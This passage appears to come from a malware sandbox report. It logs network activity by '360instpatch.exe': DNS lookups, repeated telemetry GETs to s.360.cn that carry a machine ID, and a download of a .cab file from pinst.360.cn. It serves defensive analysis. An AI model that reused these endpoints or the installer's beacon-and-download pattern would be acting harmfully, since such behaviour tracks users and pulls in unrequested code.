                                                                                                                                                                                                            Dec 29, 2024 09:03:16.816592932 CET80100041.192.136.134192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:16.872781038 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                                                            Dec 29, 2024 09:03:16.885987997 CET80100041.192.136.134192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:16.918523073 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:16.918710947 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:16.983709097 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:17.091232061 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                                                            Dec 29, 2024 09:03:17.203706026 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:03:17.309964895 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                                                            Dec 29, 2024 09:03:17.419385910 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:17.529716015 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                                                            Dec 29, 2024 09:03:17.619446039 CET80100041.192.136.134192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:17.638261080 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:03:17.765964031 CET80100041.192.136.134192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:17.859709978 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                                                            Dec 29, 2024 09:03:17.966213942 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:18.076265097 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                                                            Dec 29, 2024 09:03:18.184967041 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:03:18.210932970 CET80100041.192.136.134192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:18.294384956 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                                                            Dec 29, 2024 09:03:18.404675961 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:18.435652018 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:18.513411999 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                                                            Dec 29, 2024 09:03:18.623295069 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:03:18.731978893 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                                                            Dec 29, 2024 09:03:18.759798050 CET80100041.192.136.134192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:18.841214895 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:18.908266068 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:18.959465981 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                                                            Dec 29, 2024 09:03:19.059981108 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:03:19.169368982 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                                                            Dec 29, 2024 09:03:19.187354088 CET80100041.192.136.134192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:19.279715061 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:19.304423094 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:19.388612986 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                                                            Dec 29, 2024 09:03:19.497468948 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:03:19.607707977 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                                                            Dec 29, 2024 09:03:19.632318974 CET80100041.192.136.134192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:19.719144106 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:19.825757027 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                                                            Dec 29, 2024 09:03:19.935992002 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:03:20.044596910 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                                                            Dec 29, 2024 09:03:20.075851917 CET80100041.192.136.134192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:20.154305935 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:20.178620100 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:20.263417959 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                                                            Dec 29, 2024 09:03:20.373389959 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:03:20.482121944 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                                                            Dec 29, 2024 09:03:20.497277975 CET80100041.192.136.134192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:20.591198921 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:20.635018110 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:20.952109098 CET80100041.192.136.134192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:21.052665949 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:23.106942892 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:03:23.666398048 CET80100041.192.136.134192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:23.765760899 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:26.279042959 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                                                            Dec 29, 2024 09:03:28.576025963 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:30.982026100 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                                                            Dec 29, 2024 09:03:33.497562885 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:35.575824022 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                                                            Dec 29, 2024 09:03:36.158420086 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:36.232105970 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                                                            Dec 29, 2024 09:03:38.309977055 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:40.827238083 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                                                            Dec 29, 2024 09:03:43.013489962 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                                                            Dec 29, 2024 09:03:43.599342108 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:43.669461012 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                                                            Dec 29, 2024 09:03:46.076172113 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:03:46.637296915 CET80100041.192.136.134192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:46.731862068 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:49.466480970 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:03:50.404820919 CET80100041.192.136.134192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:50.450795889 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:03:51.022344112 CET80100041.192.136.134192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:51.107028008 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:53.403846979 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                                                            Dec 29, 2024 09:03:55.700896978 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                                                            Dec 29, 2024 09:03:58.326112032 CET1000480192.168.2.41.192.136.134
| Timestamp | Source IP | Dest IP | Checksum | Code | Type |
|---|---|---|---|---|---|
| Dec 29, 2024 09:02:13.121221066 CET | 192.168.2.4 | 1.192.136.171 | 4a66 | (Port unreachable) | Destination Unreachable |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Dec 29, 2024 09:01:57.980811119 CET | 192.168.2.4 | 1.1.1.1 | 0x6652 | Standard query (0) | gwwifha84989.oss-ap-northeast-2.aliyuncs.com | A (IP address) | IN (0x0001) | false |
| Dec 29, 2024 09:02:09.367391109 CET | 192.168.2.4 | 1.1.1.1 | 0xfb0b | Standard query (0) | s.360.cn | A (IP address) | IN (0x0001) | false |
| Dec 29, 2024 09:02:09.554183006 CET | 192.168.2.4 | 1.1.1.1 | 0x260 | Standard query (0) | st.p.360.cn | A (IP address) | IN (0x0001) | false |
| Dec 29, 2024 09:02:09.720099926 CET | 192.168.2.4 | 1.1.1.1 | 0x8baa | Standard query (0) | agt.p.360.cn | A (IP address) | IN (0x0001) | false |
| Dec 29, 2024 09:02:09.720355034 CET | 192.168.2.4 | 1.1.1.1 | 0xd43a | Standard query (0) | tr.p.360.cn | A (IP address) | IN (0x0001) | false |
| Dec 29, 2024 09:02:14.017611980 CET | 192.168.2.4 | 1.1.1.1 | 0xffed | Standard query (0) | agd.p.360.cn | A (IP address) | IN (0x0001) | false |
| Dec 29, 2024 09:02:14.017637968 CET | 192.168.2.4 | 1.1.1.1 | 0xce55 | Standard query (0) | pinst.360.cn | A (IP address) | IN (0x0001) | false |
| Dec 29, 2024 09:02:15.013144016 CET | 192.168.2.4 | 1.1.1.1 | 0xce55 | Standard query (0) | pinst.360.cn | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Dec 29, 2024 09:01:58.441051960 CET | 1.1.1.1 | 192.168.2.4 | 0x6652 | No error (0) | gwwifha84989.oss-ap-northeast-2.aliyuncs.com | | 149.129.12.34 | A (IP address) | IN (0x0001) | false |
| Dec 29, 2024 09:02:09.783198118 CET | 1.1.1.1 | 192.168.2.4 | 0xfb0b | No error (0) | s.360.cn | | 180.163.251.230 | A (IP address) | IN (0x0001) | false |
| Dec 29, 2024 09:02:09.783198118 CET | 1.1.1.1 | 192.168.2.4 | 0xfb0b | No error (0) | s.360.cn | | 171.8.167.90 | A (IP address) | IN (0x0001) | false |
| Dec 29, 2024 09:02:09.783198118 CET | 1.1.1.1 | 192.168.2.4 | 0xfb0b | No error (0) | s.360.cn | | 171.13.14.66 | A (IP address) | IN (0x0001) | false |
| Dec 29, 2024 09:02:09.783198118 CET | 1.1.1.1 | 192.168.2.4 | 0xfb0b | No error (0) | s.360.cn | | 171.8.167.89 | A (IP address) | IN (0x0001) | false |
| Dec 29, 2024 09:02:09.965209961 CET | 1.1.1.1 | 192.168.2.4 | 0x260 | No error (0) | st.p.360.cn | | 1.192.136.170 | A (IP address) | IN (0x0001) | false |
| Dec 29, 2024 09:02:10.108865976 CET | 1.1.1.1 | 192.168.2.4 | 0xd43a | No error (0) | tr.p.360.cn | | 1.192.136.132 | A (IP address) | IN (0x0001) | false |
| Dec 29, 2024 09:02:10.108865976 CET | 1.1.1.1 | 192.168.2.4 | 0xd43a | No error (0) | tr.p.360.cn | | 1.192.136.133 | A (IP address) | IN (0x0001) | false |
| Dec 29, 2024 09:02:10.108865976 CET | 1.1.1.1 | 192.168.2.4 | 0xd43a | No error (0) | tr.p.360.cn | | 1.192.136.134 | A (IP address) | IN (0x0001) | false |
| Dec 29, 2024 09:02:10.108865976 CET | 1.1.1.1 | 192.168.2.4 | 0xd43a | No error (0) | tr.p.360.cn | | 1.192.136.135 | A (IP address) | IN (0x0001) | false |
| Dec 29, 2024 09:02:10.134640932 CET | 1.1.1.1 | 192.168.2.4 | 0x8baa | No error (0) | agt.p.360.cn | | 1.192.136.132 | A (IP address) | IN (0x0001) | false |
| Dec 29, 2024 09:02:10.134640932 CET | 1.1.1.1 | 192.168.2.4 | 0x8baa | No error (0) | agt.p.360.cn | | 1.192.136.133 | A (IP address) | IN (0x0001) | false |
| Dec 29, 2024 09:02:14.156692982 CET | 1.1.1.1 | 192.168.2.4 | 0xffed | No error (0) | agd.p.360.cn | agd2.p.360.cn | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 29, 2024 09:02:14.156692982 CET | 1.1.1.1 | 192.168.2.4 | 0xffed | No error (0) | agd2.p.360.cn | | 1.192.194.232 | A (IP address) | IN (0x0001) | false |
| Dec 29, 2024 09:02:14.156692982 CET | 1.1.1.1 | 192.168.2.4 | 0xffed | No error (0) | agd2.p.360.cn | | 1.192.194.215 | A (IP address) | IN (0x0001) | false |
| Dec 29, 2024 09:02:15.282728910 CET | 1.1.1.1 | 192.168.2.4 | 0xce55 | No error (0) | pinst.360.cn | softm.update.360safe.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 29, 2024 09:02:15.282728910 CET | 1.1.1.1 | 192.168.2.4 | 0xce55 | No error (0) | softm.update.360safe.com | seupdate.360qhcdn.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 29, 2024 09:02:15.282728910 CET | 1.1.1.1 | 192.168.2.4 | 0xce55 | No error (0) | seupdate.360qhcdn.com | | 39.156.85.231 | A (IP address) | IN (0x0001) | false |
| Dec 29, 2024 09:02:15.282728910 CET | 1.1.1.1 | 192.168.2.4 | 0xce55 | No error (0) | seupdate.360qhcdn.com | | 39.156.85.201 | A (IP address) | IN (0x0001) | false |
| Dec 29, 2024 09:02:15.282728910 CET | 1.1.1.1 | 192.168.2.4 | 0xce55 | No error (0) | seupdate.360qhcdn.com | | 39.156.85.200 | A (IP address) | IN (0x0001) | false |
| Dec 29, 2024 09:02:15.282752037 CET | 1.1.1.1 | 192.168.2.4 | 0xce55 | No error (0) | pinst.360.cn | softm.update.360safe.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 29, 2024 09:02:15.282752037 CET | 1.1.1.1 | 192.168.2.4 | 0xce55 | No error (0) | softm.update.360safe.com | seupdate.360qhcdn.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 29, 2024 09:02:15.282752037 CET | 1.1.1.1 | 192.168.2.4 | 0xce55 | No error (0) | seupdate.360qhcdn.com | | 39.156.85.231 | A (IP address) | IN (0x0001) | false |
| Dec 29, 2024 09:02:15.282752037 CET | 1.1.1.1 | 192.168.2.4 | 0xce55 | No error (0) | seupdate.360qhcdn.com | | 39.156.85.201 | A (IP address) | IN (0x0001) | false |
| Dec 29, 2024 09:02:15.282752037 CET | 1.1.1.1 | 192.168.2.4 | 0xce55 | No error (0) | seupdate.360qhcdn.com | | 39.156.85.200 | A (IP address) | IN (0x0001) | false |
                                                                                                                                                                                                            • gwwifha84989.oss-ap-northeast-2.aliyuncs.com
                                                                                                                                                                                                            • s.360.cn
                                                                                                                                                                                                            • pinst.360.cn
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.4 | 49739 | 180.163.251.230 | 80 | 4460 | C:\Users\user\Downloads\360instpatch.exe |
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Dec 29, 2024 09:02:09.904696941 CET398OUTGET /safe/instcomp.htm?soft=1000&status=100&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                            Host: s.360.cn
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.515594959 CET240INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: openresty/1.15.8.2
                                                                                                                                                                                                            Date: Sun, 29 Dec 2024 08:02:11 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Last-Modified: Fri, 27 Jul 2018 07:11:44 GMT
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "5b5ac5b0-0"
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.637595892 CET428OUTGET /safe/instcomp.htm?soft=1000&status=127&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&parent=Non-existent%20Process&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                            Host: s.360.cn
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.185935020 CET240INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: openresty/1.15.8.2
                                                                                                                                                                                                            Date: Sun, 29 Dec 2024 08:02:11 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Last-Modified: Fri, 27 Jul 2018 07:11:44 GMT
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "5b5ac5b0-0"
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.187710047 CET398OUTGET /safe/instcomp.htm?soft=1000&status=109&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                            Host: s.360.cn
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.739072084 CET240INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: openresty/1.15.8.2
                                                                                                                                                                                                            Date: Sun, 29 Dec 2024 08:02:12 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Last-Modified: Fri, 27 Jul 2018 07:11:44 GMT
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "5b5ac5b0-0"
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.744915962 CET385OUTGET /safe/instcomp.htm?soft=1000&status=12&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                            Host: s.360.cn
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.293493032 CET240INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: openresty/1.15.8.2
                                                                                                                                                                                                            Date: Sun, 29 Dec 2024 08:02:13 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Last-Modified: Fri, 27 Jul 2018 07:11:44 GMT
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "5b5ac5b0-0"
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.296830893 CET235OUTGET /safe/instcomp.htm?soft=425&status=1&mid=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=0&downrate=0&downlen=0 HTTP/1.1
                                                                                                                                                                                                            Host: s.360.cn
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.846714020 CET240INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: openresty/1.15.8.2
                                                                                                                                                                                                            Date: Sun, 29 Dec 2024 08:02:13 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Last-Modified: Fri, 27 Jul 2018 07:11:44 GMT
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "5b5ac5b0-0"
                                                                                                                                                                                                            Accept-Ranges: bytes
Dec 29, 2024 09:02:13.848267078 CET | 398 | OUT | GET /safe/instcomp.htm?soft=1000&status=107&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                            Host: s.360.cn
                                                                                                                                                                                                            Connection: Keep-Alive
Dec 29, 2024 09:02:14.397253036 CET | 240 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: openresty/1.15.8.2
                                                                                                                                                                                                            Date: Sun, 29 Dec 2024 08:02:14 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Last-Modified: Fri, 27 Jul 2018 07:11:44 GMT
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "5b5ac5b0-0"
                                                                                                                                                                                                            Accept-Ranges: bytes
Dec 29, 2024 09:02:18.027101994 CET | 398 | OUT | GET /safe/instcomp.htm?soft=1000&status=129&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                            Host: s.360.cn
                                                                                                                                                                                                            Connection: Keep-Alive
Dec 29, 2024 09:02:18.577312946 CET | 240 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: openresty/1.15.8.2
                                                                                                                                                                                                            Date: Sun, 29 Dec 2024 08:02:18 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Last-Modified: Fri, 27 Jul 2018 07:11:44 GMT
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "5b5ac5b0-0"
                                                                                                                                                                                                            Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49740 | 180.163.251.230 | 80 | 4460 | C:\Users\user\Downloads\360instpatch.exe
Timestamp | Bytes transferred | Direction | Data
Dec 29, 2024 09:02:12.158313036 CET | 384 | OUT | GET /safe/instcomp.htm?soft=1000&status=1&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                            Host: s.360.cn
                                                                                                                                                                                                            Connection: Keep-Alive
Dec 29, 2024 09:02:13.697072983 CET | 240 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: openresty/1.15.8.2
                                                                                                                                                                                                            Date: Sun, 29 Dec 2024 08:02:13 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Last-Modified: Fri, 27 Jul 2018 07:16:11 GMT
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "5b5ac6bb-0"
                                                                                                                                                                                                            Accept-Ranges: bytes
Dec 29, 2024 09:02:14.007144928 CET | 384 | OUT | GET /safe/instcomp.htm?soft=1000&status=8&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                            Host: s.360.cn
                                                                                                                                                                                                            Connection: Keep-Alive
Dec 29, 2024 09:02:14.536041021 CET | 240 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: openresty/1.15.8.2
                                                                                                                                                                                                            Date: Sun, 29 Dec 2024 08:02:14 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Last-Modified: Fri, 27 Jul 2018 07:16:11 GMT
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "5b5ac6bb-0"
                                                                                                                                                                                                            Accept-Ranges: bytes
Dec 29, 2024 09:02:18.026551962 CET | 385 | OUT | GET /safe/instcomp.htm?soft=1000&status=10&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                            Host: s.360.cn
                                                                                                                                                                                                            Connection: Keep-Alive
Dec 29, 2024 09:02:18.553643942 CET | 240 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: openresty/1.15.8.2
                                                                                                                                                                                                            Date: Sun, 29 Dec 2024 08:02:18 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Last-Modified: Fri, 27 Jul 2018 07:16:11 GMT
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "5b5ac6bb-0"
                                                                                                                                                                                                            Accept-Ranges: bytes
Dec 29, 2024 09:02:18.554636002 CET | 239 | OUT | GET /safe/instcomp.htm?soft=425&status=19&mid=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=4187&downrate=0&downlen=0 HTTP/1.1
                                                                                                                                                                                                            Host: s.360.cn
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
Dec 29, 2024 09:02:19.081820965 CET | 240 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: openresty/1.15.8.2
                                                                                                                                                                                                            Date: Sun, 29 Dec 2024 08:02:18 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Last-Modified: Fri, 27 Jul 2018 07:16:11 GMT
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "5b5ac6bb-0"
                                                                                                                                                                                                            Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49747 | 39.156.85.231 | 80 | 4460 | C:\Users\user\Downloads\360instpatch.exe
Timestamp | Bytes transferred | Direction | Data
Dec 29, 2024 09:02:15.406244993 CET | 202 | OUT | GET /360safe/h_inst.cab?rd=36608336 HTTP/1.1
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
                                                                                                                                                                                                            Host: pinst.360.cn
                                                                                                                                                                                                            Connection: Close
                                                                                                                                                                                                            Cache-Control: no-cache
Dec 29, 2024 09:02:17.001564026 CET | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
